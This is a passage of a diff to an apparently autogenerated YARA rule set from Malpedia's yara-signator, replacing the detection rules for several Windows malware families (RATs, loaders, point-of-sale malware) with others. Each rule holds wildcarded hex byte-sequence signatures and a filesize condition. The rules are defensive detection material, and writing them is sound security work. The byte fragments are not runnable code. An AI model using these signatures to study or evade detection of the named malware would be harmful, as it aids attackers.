+		$sequence_0 = { 488b442458 4839442428 0f8dd0000000 0fb6442421 83c001 }
+		$sequence_1 = { ff15???????? 48898424902b0000 488d742470 488bbc24902b0000 b990180000 }
+		$sequence_2 = { b9ffff1f00 ff15???????? 4889842450020000 4883bc245002000000 0f842b020000 4c8d842458020000 baff010f00 }
+		$sequence_3 = { 48898424c0020000 837c243400 746b 4c8b842490000000 8b542434 488b8c24c0020000 }
+		$sequence_4 = { 488d7c2450 488d35fba70000 b926000000 f3a4 }
+		$sequence_5 = { 4889542410 48894c2408 4883ec48 488b442460 0fb68000010000 88442421 }
+		$sequence_6 = { 488b0424 480590180000 48890424 ebb7 488b442420 }
+		$sequence_7 = { 85c0 750a b801000000 e9???????? 488d442440 4889842498030000 488d842460030000 }
+		$sequence_8 = { 4533c9 4533c0 33d2 33c9 e8???????? 488d158a090100 }
+		$sequence_9 = { 488bd9 448d6eff 443bd7 754f 4c8d0565ce0000 458bcd ba00010000 }
 
 	condition:
-		7 of them and filesize < 630784
+		7 of them and filesize < 373760
 }
-rule MALPEDIA_Win_Action_Rat_Auto : FILE
+rule MALPEDIA_Win_Orchard_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "0abe3565-6584-5599-b7de-461d5c2244c8"
+		id = "5c398118-a219-5655-a01d-698db312ac7e"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.action_rat"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.action_rat_auto.yar#L1-L132"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.orchard"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.orchard_auto.yar#L1-L159"
 		license_url = "N/A"
-		logic_hash = "5ed778484db64ab13a477929c07da39230f4ad04ded616573b48c243aaef2b6f"
+		logic_hash = "ef8c17e904478cac826167cfa0e1c29f054430dec351151f351e3917ccca81f2"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -100685,32 +100839,38 @@ rule MALPEDIA_Win_Action_Rat_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 8b10 8955ec 8b45ec 3b45f0 7707 e8???????? eb3c }
-		$sequence_1 = { 894d9c c645fc00 8d4db0 e8???????? c745fcffffffff 8d4d18 e8???????? }
-		$sequence_2 = { 8b4df8 c1e104 81c1???????? e8???????? 8b55f8 c1e204 038298f80210 }
-		$sequence_3 = { 51 ff15???????? 83c404 85c0 7412 0fbe5508 83ea30 }
-		$sequence_4 = { 8b55f4 837a1800 7420 0fb645fb 50 8b4df4 8b4918 }
-		$sequence_5 = { e8???????? 83c408 8d450c 50 8b4dec 83c104 51 }
-		$sequence_6 = { d1e8 8945ec 8b4dec 034dc8 894de0 8b55f8 }
-		$sequence_7 = { 8d4dec 51 8b4d08 e8???????? 50 8d55d0 }
-		$sequence_8 = { 7702 eb02 eb9f 6a00 8b4dd4 51 8d4dd8 }
-		$sequence_9 = { 8d4dd8 e8???????? 50 e8???????? 83c414 8945d4 8d4dd8 }
+		$sequence_0 = { 8b49fc 83c223 2bc1 83c0fc 83f81f 0f877e030000 52 }
+		$sequence_1 = { 83c028 895de0 8b5de8 894348 }
+		$sequence_2 = { 8b75a8 46 56 e8???????? 8bf8 }
+		$sequence_3 = { 89542420 f7e1 8bc8 8954240c }
+		$sequence_4 = { 56 ff15???????? ff15???????? 50 6a00 }
+		$sequence_5 = { 8d442410 50 ff15???????? 6685c0 }
+		$sequence_6 = { 6a05 c70600000000 c7461000000000 c746140f000000 68???????? }
+		$sequence_7 = { f7f9 81c2d0070000 52 ffd6 }
+		$sequence_8 = { 0f877e030000 52 51 e8???????? 83c408 }
+		$sequence_9 = { 50 ff15???????? 83f805 7507 }
+		$sequence_10 = { c645fc08 e8???????? 894604 83c404 8d4718 897034 8d5804 }
+		$sequence_11 = { 83c404 e8???????? 99 b95b000000 f7f9 }
+		$sequence_12 = { 89542428 8b54240c 83d200 03c1 }
+		$sequence_13 = { e8???????? 894604 83c318 897730 }
+		$sequence_14 = { 8bc8 8bc7 8d9d48ffffff c645fc03 }
+		$sequence_15 = { 8bc8 8bc7 8d5c2460 c68424a800000001 e8???????? 50 }
 
 	condition:
-		7 of them and filesize < 480256
+		7 of them and filesize < 4716352
 }
-rule MALPEDIA_Win_Bunnyloader_Auto : FILE
+rule MALPEDIA_Win_Pkybot_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "0daa091a-7685-5a2e-b265-d5329b5c0a21"
+		id = "29bf327d-061e-5e00-99c9-e0f77546c9d5"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.bunnyloader"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.bunnyloader_auto.yar#L1-L134"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.pkybot"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.pkybot_auto.yar#L1-L115"
 		license_url = "N/A"
-		logic_hash = "b53a936a0dceb8c6261eaef889e6613b1973524457e163036a774308b6a54923"
+		logic_hash = "8f4c476e3b3790c8de41f37bef9cc1cce302daf7501c6563be237c0b8f2d2ef4"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -100724,32 +100884,32 @@ rule MALPEDIA_Win_Bunnyloader_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { ff742414 ba40000000 8bcf ff750c 50 e8???????? 83c40c }
-		$sequence_1 = { e9???????? 8b4318 8b560c 89542420 a828 745a b9???????? }
-		$sequence_2 = { c745dc00000000 89857cffffff 7432 50 8d4dd4 e8???????? ffb57cffffff }
-		$sequence_3 = { 894df4 85c9 743a 8bc8 33c0 83c101 13c0 }
-		$sequence_4 = { c6853fffffff00 8d95b8feffff ffb53fffffff 8d8df8fdffff c645fc2d e8???????? 83c404 }
-		$sequence_5 = { e8???????? 8b4df8 83c408 8b550c 6689044a 8a06 3c20 }
-		$sequence_6 = { 8d5e54 8bd3 894650 8bcf e8???????? 8bbd64feffff eb2d }
-		$sequence_7 = { e8???????? 83c408 e9???????? 8b442420 807c241700 0f8418030000 807e5700 }
-		$sequence_8 = { e8???????? 8bf8 8b45e4 03fe 13d3 83c701 13d3 }
-		$sequence_9 = { c6464400 8a4201 884645 803a00 746e 0fb64201 33c9 }
+		$sequence_0 = { 8bf0 eb02 33f6 8b4704 0590000000 894620 }
+		$sequence_1 = { 33c0 e9???????? 53 6a10 ff7510 8d45f0 }
+		$sequence_2 = { 53 ff7004 ff30 6aff }
+		$sequence_3 = { 7407 46 8a06 84c0 79eb 8bc6 }
+		$sequence_4 = { 7510 8b4e04 21413c c741300d000000 }
+		$sequence_5 = { 6801000040 ff7510 ff750c e8???????? }
+		$sequence_6 = { 7503 8b7104 83c10c e8???????? 50 8bce }
+		$sequence_7 = { 8b07 8bcf ff5008 6a2c e8???????? }
+		$sequence_8 = { 8b4008 eb08 e8???????? 59 }
+		$sequence_9 = { 56 ff7510 ff750c ff7508 ff15???????? 85c0 }
 
 	condition:
-		7 of them and filesize < 2998272
+		7 of them and filesize < 204800
 }
-rule MALPEDIA_Win_Crackedcantil_Auto : FILE
+rule MALPEDIA_Win_Former_First_Rat_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "cc3fcc34-6200-516b-a930-713cd7528fd1"
+		id = "b32c8876-3cb4-5a83-afbc-8273b6710cbb"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.crackedcantil"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.crackedcantil_auto.yar#L1-L134"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.former_first_rat"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.former_first_rat_auto.yar#L1-L170"
 		license_url = "N/A"
-		logic_hash = "63fa5a97e37e9297a9b2c0a9f33b3e3f4a0c35e0f5f733be56805a4bbd636bfb"
+		logic_hash = "993e92398130145e5edd81dd2e97cc96804b675ca01f408cd00440763a5fee35"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -100763,32 +100923,38 @@ rule MALPEDIA_Win_Crackedcantil_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { ffc8 89442420 837c242400 7e45 488b442428 4883780800 7429 }
-		$sequence_1 = { e8???????? 90 488d8c24e06f0000 e8???????? 488d842483000000 488bf8 33c0 }
-		$sequence_2 = { f7d9 81e9b2638081 29cb 59 81c3e75cef77 81ebcdbddaf2 01d8 }
-		$sequence_3 = { ffc9 8bc9 488b542478 88040a 488b542438 488b4c2478 e8???????? }
-		$sequence_4 = { f3aa 0fb684248e000000 88842490040000 660f6f842490570000 660f7f842470350000 488b8424c80f0000 f30f6f00 }
-		$sequence_5 = { e8???????? 90 488d842470030000 4889842478030000 488b942478030000 488d0de1993000 e8???????? }
-		$sequence_6 = { e8???????? 488bc8 e8???????? 488bc8 e8???????? 898424301c0000 ba08000000 }
-		$sequence_7 = { f3aa 488d8424b8020000 488bf8 33c0 b901000000 f3aa 488d8424b9020000 }
-		$sequence_8 = { ffc0 89442430 488b442478 0fb74060 ffc8 39442430 7d3d }
-		$sequence_9 = { e9???????? 9c 4156 4883ec08 4c893424 ff3424 415e }
+		$sequence_0 = { 898dd4feffff c785e0feffff02000000 899decfeffff 899d04ffffff 8d5001 8a08 40 }
+		$sequence_1 = { 53 68???????? e8???????? 83c408 eb08 8bd8 899d08efffff }
+		$sequence_2 = { e8???????? 83c404 c744242800100000 6800100000 e8???????? 83c404 89442438 }
+		$sequence_3 = { 7505 e8???????? 8b15???????? a1???????? 8b0d???????? 8995c8eeffff 8b15???????? }
+		$sequence_4 = { 83c40c 33c0 6803010000 8d8df8feffff }
+		$sequence_5 = { c785d8feffff00000100 c7850cffffff00000000 89b5f8feffff 0f8455010000 8da42400000000 a1???????? 8b9508ffffff }
+		$sequence_6 = { c745e400040000 837d1400 8b4ddc 8d55e4 8d0433 7415 6810040000 }
+		$sequence_7 = { 83c404 89442468 3bc3 750d 68???????? }
+		$sequence_8 = { 413bc6 0f848d010000 488d542440 488d4c2450 ff15???????? }
+		$sequence_9 = { 488d8c24a0000000 e8???????? 4d85f6 751d }
+		$sequence_10 = { e8???????? eb7a 4983f8fe 7605 }
+		$sequence_11 = { 4885f6 7456 488b4b08 4885c9 7444 }
+		$sequence_12 = { 48c783900000000f000000 c6437800 48837b6010 7209 488b4b48 }
+		$sequence_13 = { 48894720 488d0498 48894728 b001 488b9c24a0000000 }
+		$sequence_14 = { 488d542420 e8???????? 90 48837c244008 7275 }
+		$sequence_15 = { 488d942490020000 488d4c2440 e8???????? 90 }
 
 	condition:
-		7 of them and filesize < 37863424
+		7 of them and filesize < 626688
 }
-rule MALPEDIA_Win_Fullmetal_Auto : FILE
+rule MALPEDIA_Win_Royalcli_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "b8b29202-9be6-50e1-9bec-3cebf32dec61"
+		id = "9a5a0dbf-041d-5a71-ace4-cc85bbf8dbac"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.fullmetal"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.fullmetal_auto.yar#L1-L95"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.royalcli"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.royalcli_auto.yar#L1-L130"
 		license_url = "N/A"
-		logic_hash = "c47370c8b8f3f3ccbb9778b64f7c7a952cf6e37e2cb16598ed18037ff7fcc6b0"
+		logic_hash = "c1838945d5c33b64e750d6ae434f43dd65441d3926695dd6e2b710434dc1c7bb"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -100802,32 +100968,34 @@ rule MALPEDIA_Win_Fullmetal_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 90 8b4714 90 c1e80d }
-		$sequence_1 = { 488b05???????? 488d4de0 4d63c8 488bd3 4c8d8300010000 }
-		$sequence_2 = { e9???????? 488d1580960200 488bcb ff15???????? }
-		$sequence_3 = { 85c0 7918 488d542420 488d0dc0b60200 }
-		$sequence_4 = { 83e03f 4c8d3cc0 4a8b84e9404a0400 4a8b44f828 488945e7 458be1 }
-		$sequence_5 = { 85c0 7560 49ffc6 6646392c73 75f6 }
-		$sequence_6 = { eb20 bffdffffff 488b9424c8000000 488d0d2bc30200 4883c212 }
-		$sequence_7 = { 415e c3 8bc1 488d0df7990200 }
+		$sequence_0 = { 6a02 53 56 c745e844006900 c745ec73006100 c745f062006c00 c745f465004300 }
+		$sequence_1 = { 33f6 85ff 7e4b 4f c1ef02 8d4a01 }
+		$sequence_2 = { 66895008 6800000080 8d85d8fdffff 50 ffd3 83f8ff 7421 }
+		$sequence_3 = { 6840000100 89b5c0feffff e8???????? 83c404 }
+		$sequence_4 = { 5d c3 56 57 6a01 50 e8???????? }
+		$sequence_5 = { 33cd e8???????? 8be5 5d c3 8b85e8fcffff 6840771b00 }
+		$sequence_6 = { 68???????? ffd7 8d55e8 52 e8???????? 83c404 8bd8 }
+		$sequence_7 = { 8b5d0c 8995bcf9ffff 8b5518 899da8f9ffff 8995b8f9ffff 7d11 33c0 }
+		$sequence_8 = { 8b85bcfeffff 50 33f6 ff15???????? e9???????? 3d00000100 0f8f2bffffff }
+		$sequence_9 = { 8d85c4fdffff 50 68???????? 68???????? 68???????? ffd6 bf???????? }
 
 	condition:
-		7 of them and filesize < 733184
+		7 of them and filesize < 204800
 }
-rule MALPEDIA_Win_Slip_Screen_Auto : FILE
+rule MALPEDIA_Win_Grease_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "ad9c8d39-15d3-5df8-9251-a49652741d85"
+		id = "ecfbbfe9-c011-518f-ab9d-ed514af53077"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.slip_screen"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.slip_screen_auto.yar#L1-L126"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.grease"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.grease_auto.yar#L1-L234"
 		license_url = "N/A"
-		logic_hash = "dad34e4a0f7996ab63085bce3884e3e4048e2436bb6df0518e66ce50f19fbbe3"
+		logic_hash = "7c8c14c35a0def9c37a4dcb1634bd39b69466704a6828c5b8b5cd9c96e04b3c0"
 		score = 75
-		quality = 75
+		quality = 73
 		tags = "FILE"
 		version = "1"
 		tool = "yara-signator v0.6.0"
@@ -100839,71 +101007,84 @@ rule MALPEDIA_Win_Slip_Screen_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { eb0c 4881c7e8000000 4885f6 7405 488bce ff17 4d85f6 }
-		$sequence_1 = { 4885c9 0f8498000000 4863413c 4533db 448b8c0888000000 }
-		$sequence_2 = { 48898798000000 4885c0 0f8462020000 41b8ce48ccfd 8bd6 488bcb }
-		$sequence_3 = { 7447 410fb702 6685c0 7438 8d4abf 6683f919 448d4220 }
-		$sequence_4 = { eb02 33c0 4c8d9c2490040000 498b5b28 498b6b30 }
-		$sequence_5 = { 4903c1 4d8bc8 488bc8 48c1e020 48c1e920 480bc8 0fb7c1 }
-		$sequence_6 = { 0f1000 0f1145c4 f20f104810 f20f114dd4 8b4018 8945dc }
-		$sequence_7 = { 488b8100010000 4885c0 7403 f0ff00 488d4138 41b806000000 488d1547960000 }
-		$sequence_8 = { 488bd0 48c1e020 48c1ea20 480bd0 0fb7c2 6633443bfa }
-		$sequence_9 = { 0fafca 4403c9 440fafc8 458bc1 440fafc0 428d0c0a }
+		$sequence_0 = { 52 50 683f000f00 50 50 50 }
+		$sequence_1 = { 4053 4881ec90020000 488b05???????? 4833c4 4889842480020000 488d4c2472 }
+		$sequence_2 = { 4889442438 48897c2430 4533c0 c74424283f000f00 897c2420 ff15???????? 85c0 }
+		$sequence_3 = { 895c2420 ff15???????? 85c0 0f85e7000000 }
+		$sequence_4 = { 488b4c2460 ff15???????? b801000000 488b8c2480020000 4833cc e8???????? 4881c490020000 }
+		$sequence_5 = { 4533c0 488bd3 c744242804000000 4889442420 ff15???????? 488b4c2450 ff15???????? }
+		$sequence_6 = { 85c0 0f85e7000000 488b4c2460 488d442458 }
+		$sequence_7 = { 488d542470 41b93f000f00 4533c0 48c7c102000080 }
+		$sequence_8 = { 85c0 7534 488b4c2450 488d442458 41b904000000 4533c0 }
+		$sequence_9 = { 51 6a04 53 68???????? 52 895c2430 ffd5 }
+		$sequence_10 = { 68???????? 52 e8???????? 83c40c 8d84242c040000 55 50 }
+		$sequence_11 = { c644342064 e9???????? c644342070 e9???????? c644342073 e9???????? }
+		$sequence_12 = { 51 56 66899c2440010000 66899c2446010000 66c784244a0100000700 }
+		$sequence_13 = { e9???????? c644340c79 e9???????? c644340c77 e9???????? c644340c76 }
+		$sequence_14 = { 8d442424 8d5001 8a08 83c001 }
+		$sequence_15 = { 66899c2440010000 66899c2446010000 66899c244a010000 66899c244c010000 }
+		$sequence_16 = { 68???????? 52 e8???????? 83c408 8d442414 50 }
+		$sequence_17 = { 83c408 8d442410 50 681f000200 53 8d4c2430 }
+		$sequence_18 = { 6a00 50 c684241401000000 e8???????? 0fbe4c2410 56 }
+		$sequence_19 = { c684342406000040 eb62 c68434240600007b eb58 }
+		$sequence_20 = { 8dbc24490c0000 899424400c0000 be???????? f3ab 66ab }
+		$sequence_21 = { eb3d c6440c0c3c eb36 c6440c0c28 eb2f c6440c0c24 eb28 }
+		$sequence_22 = { 8d442414 6a04 50 6a04 55 68???????? 51 }
 
 	condition:
-		7 of them and filesize < 282624
+		7 of them and filesize < 278528
 }
-rule MALPEDIA_Win_Neconyd_Auto : FILE
+rule MALPEDIA_Win_Floki_Bot_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "0a26010e-37e7-5246-804a-229e327c846f"
-		date = "2026-01-05"
-		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.neconyd"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.neconyd_auto.yar#L1-L125"
+		id = "25c81d04-9abf-5940-8e55-7e5abeb99153"
+		date = "2024-10-31"
+		modified = "2024-11-11"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.floki_bot"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.floki_bot_auto.yar#L1-L131"
 		license_url = "N/A"
-		logic_hash = "a947c838b71e86e1d4014575969fcaf0468066058b0d2c62ee2db801fb092cd0"
+		logic_hash = "e2f9df61c4df036b71f6882cf4c35419384506db07aa4de7d79fcad14d6710ad"
 		score = 75
 		quality = 75
 		tags = "FILE"
 		version = "1"
 		tool = "yara-signator v0.6.0"
 		signator_config = "callsandjumps;datarefs;binvalue"
-		malpedia_rule_date = "20260105"
-		malpedia_hash = "19b79e7cab4eaf532122e5b45a77dd8f6bb5cc79"
-		malpedia_version = "20251219"
+		malpedia_rule_date = "20241030"
+		malpedia_hash = "26e26953c49c8efafbf72a38076855d578e0a2e4"
+		malpedia_version = "20241030"
 		malpedia_license = "CC BY-SA 4.0"
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 74c7 ff75fc 8d85f0efffff 50 8d0437 50 }
-		$sequence_1 = { c6466701 c6466804 89460c 894e60 397d18 0f85b0000000 8b15???????? }
-		$sequence_2 = { c6466500 c6466b00 c6466c00 8b442418 898680000000 33c0 }
-		$sequence_3 = { c3 56 66c7003000 57 40 40 }
-		$sequence_4 = { 8365fc00 8d45fc 50 6a27 6a5e 8d45d4 }
-		$sequence_5 = { 57 bb???????? 50 8bd3 e8???????? b9???????? }
-		$sequence_6 = { 66c745ae5814 66c745b0d104 66c745b2c19d 66c745b42070 66c745b66afc 66c745b88fed }
-		$sequence_7 = { eb06 81c1ffff0000 880e 46 ff45fc }
-		$sequence_8 = { 29450c 83c40c 03f0 8d45fc 50 6800100000 8d85f0efffff }
-		$sequence_9 = { 394d18 0f8d35010000 8b0d???????? 3bcf 750c 66c745d83000 }
+		$sequence_0 = { fe45ff 8a45ff 3a45fc 7285 fe45fe 8a45fe 3a4601 }
+		$sequence_1 = { 8bc6 8d74241c e8???????? 84c0 0f843f010000 8b442414 }
+		$sequence_2 = { 53 57 8bf8 8d45f8 50 33db }
+		$sequence_3 = { 8b4c2414 0fb713 83fa04 7516 663911 7507 8b4d10 }
+		$sequence_4 = { 50 53 ff35???????? 682d010000 e8???????? 83c418 }
+		$sequence_5 = { 50 e8???????? ff471c 015f14 8bc6 8b55fc e8???????? }
+		$sequence_6 = { bf???????? e8???????? ff75f0 84c0 7407 e8???????? eb08 }
+		$sequence_7 = { 8d45f4 50 e8???????? 6a09 6a00 8d45f4 50 }
+		$sequence_8 = { 744d 66391f 7448 8d4c2440 e8???????? 6a04 8d544444 }
+		$sequence_9 = { 84c0 744b 8b45f8 85c0 7414 ff75ec e8???????? }
 
 	condition:
-		7 of them and filesize < 326182
+		7 of them and filesize < 286720
 }
-rule MALPEDIA_Win_Threebyte_Auto : FILE
+rule MALPEDIA_Win_Deputydog_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "799d81f4-c3a7-51cd-8c7b-153e88acd8dd"
+		id = "cfca8e79-f926-56a2-8c99-b5468ee055dd"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.threebyte"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.threebyte_auto.yar#L1-L128"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.deputydog"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.deputydog_auto.yar#L1-L127"
 		license_url = "N/A"
-		logic_hash = "2ca2547a0ff0213816f73a796ceafd61c5b00d7d4af221dfd97f4e43556e0e8c"
+		logic_hash = "ed5d5b1067c36186826e4424b2a432496a63ccbe3c2d0e290408a4c31dcb8d3d"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -100917,32 +101098,32 @@ rule MALPEDIA_Win_Threebyte_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 8b9598fbffff 52 8d859cfbffff 50 8d8d4cf7ffff 51 8d956cf7ffff }
-		$sequence_1 = { 6a20 68cc000000 8d8de0fdffff 51 e8???????? 83c40c }
-		$sequence_2 = { c68531faffff6d c68532faffff65 c68533faffff00 8d8d28faffff 51 8b95a8faffff 52 }
-		$sequence_3 = { 52 8d8544feffff 50 8d8dccfeffff 51 e8???????? }
-		$sequence_4 = { ff15???????? 8d95ccfcffff 52 8d8510f8ffff 50 8d8dd0fdffff 51 }
-		$sequence_5 = { c685b1fdffff00 ff15???????? 50 8d8d94fdffff 51 }
-		$sequence_6 = { 81bda4f7fffff6010000 7507 b8faffffff eb05 b8f9ffffff 5f 8be5 }
-		$sequence_7 = { e8???????? 83c404 e9???????? 6a02 6a00 6a00 8b95d0fdffff }
-		$sequence_8 = { 50 e8???????? 83c408 89853cffffff 83bd3cffffff00 }
-		$sequence_9 = { 3b4d0c 7d15 8b5508 33c0 8a02 8945e0 8b4d08 }
+		$sequence_0 = { c20c00 56 8bf1 6a04 ff74240c 8d4624 50 }
+		$sequence_1 = { ff15???????? 85c0 7424 8b45d8 8b55dc 6a14 }
+		$sequence_2 = { 8b7508 ff75f0 ff15???????? 57 6880000000 }
+		$sequence_3 = { 8b45f0 59 885dfc 59 8906 57 }
+		$sequence_4 = { c0e102 884dff eb35 83fa01 7511 8ac1 c0e804 }
+		$sequence_5 = { 6a14 59 e8???????? 8b55d4 6a14 8945e4 8b45d0 }
+		$sequence_6 = { 6a15 be???????? 59 bf???????? f3a5 8d8d74ffffff e8???????? }
+		$sequence_7 = { c645fc0a ff15???????? 8d8dccfeffff c645fc05 e8???????? 8d45cc }
+		$sequence_8 = { 2bc8 c1f905 394df0 0f83e2000000 03c7 56 50 }
+		$sequence_9 = { 8808 eb53 83ff01 7518 8a0e }
 
 	condition:
-		7 of them and filesize < 180224
+		7 of them and filesize < 90112
 }
-rule MALPEDIA_Win_Scanpos_Auto : FILE
+rule MALPEDIA_Win_Xbot_Pos_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "ea54b41f-0e3e-59d0-9d34-b01116c8bd16"
+		id = "940e14dd-221d-5819-92eb-1310f719add8"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.scanpos"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.scanpos_auto.yar#L1-L122"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.xbot_pos"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.xbot_pos_auto.yar#L1-L126"
 		license_url = "N/A"
-		logic_hash = "d918dbccd253554c0b76ec27fc4d9c167e1c0563dfe60b916ccc540524fa3716"
+		logic_hash = "535bdd8a229ae04e062f9eb15912ae47549a3a824b333a9bb79944aa1215914b"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -100956,34 +101137,34 @@ rule MALPEDIA_Win_Scanpos_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 64a300000000 8b4508 33d2 c745e80f000000 8955e4 }
-		$sequence_1 = { 3ad3 75f9 2bc1 8bd0 }
-		$sequence_2 = { e8???????? 83c404 8b0d???????? 8939 8b15???????? 893a }
-		$sequence_3 = { 8d85e8feffff 50 51 68???????? 68???????? e8???????? 83c40c }
-		$sequence_4 = { 53 52 ffd0 3bc3 7508 3bd7 }
-		$sequence_5 = { e9???????? 8db5acfeffff e9???????? 8b542408 8d420c 8b8a8cfeffff 33c8 }
-		$sequence_6 = { e8???????? 03c8 8b4608 2bc2 3bc8 }
-		$sequence_7 = { 50 8d45f4 64a300000000 8b4508 8918 8b0b }
-		$sequence_8 = { 3bfb 0f82b9fdffff 837de810 720c 8b4dd4 }
-		$sequence_9 = { 6aff 68???????? 53 ff15???????? 85c0 0f95c3 837dcc10 }
+		$sequence_0 = { c685d3fcffff00 c745fcffffffff 8d4dd0 e8???????? }
+		$sequence_1 = { 6bc230 03048de0465600 b901000000 c1e100 c644082a0a 807dff01 }
+		$sequence_2 = { eb0a c78558fcffff01000000 8a9558fcffff 88959ffdffff }
+		$sequence_3 = { 005f56 4d 005f56 4d 0026 56 4d }
+		$sequence_4 = { e8???????? c685bbfdffff01 c745fcffffffff 8d8da8feffff e8???????? 8a85bbfdffff 52 }
+		$sequence_5 = { 4c 005166 4c 004566 4c 007566 4c }
+		$sequence_6 = { 743e 83ec0c 8bc4 89a5ecfeffff 6a00 50 8d4d0c }
+		$sequence_7 = { 83e13f 6bd130 8b0485e0465600 0fb64c1028 83e140 740f }
+		$sequence_8 = { c68583f9ffff01 eb07 c68583f9ffff00 8a8d83f9ffff 888dcbfbffff 8b45e8 8a8dd7fbffff }
+		$sequence_9 = { e8???????? 83c404 83e03f 6bc830 030cb5e0465600 894de4 eb07 }
 
 	condition:
-		7 of them and filesize < 229376
+		7 of them and filesize < 3031040
 }
-rule MALPEDIA_Win_Graphican_Auto : FILE
+rule MALPEDIA_Win_Suppobox_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "306b4097-e66d-555f-a881-23bb9c0b513c"
+		id = "5b7250ed-3647-5a89-a116-017b310c526f"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.graphican"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.graphican_auto.yar#L1-L128"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.suppobox"
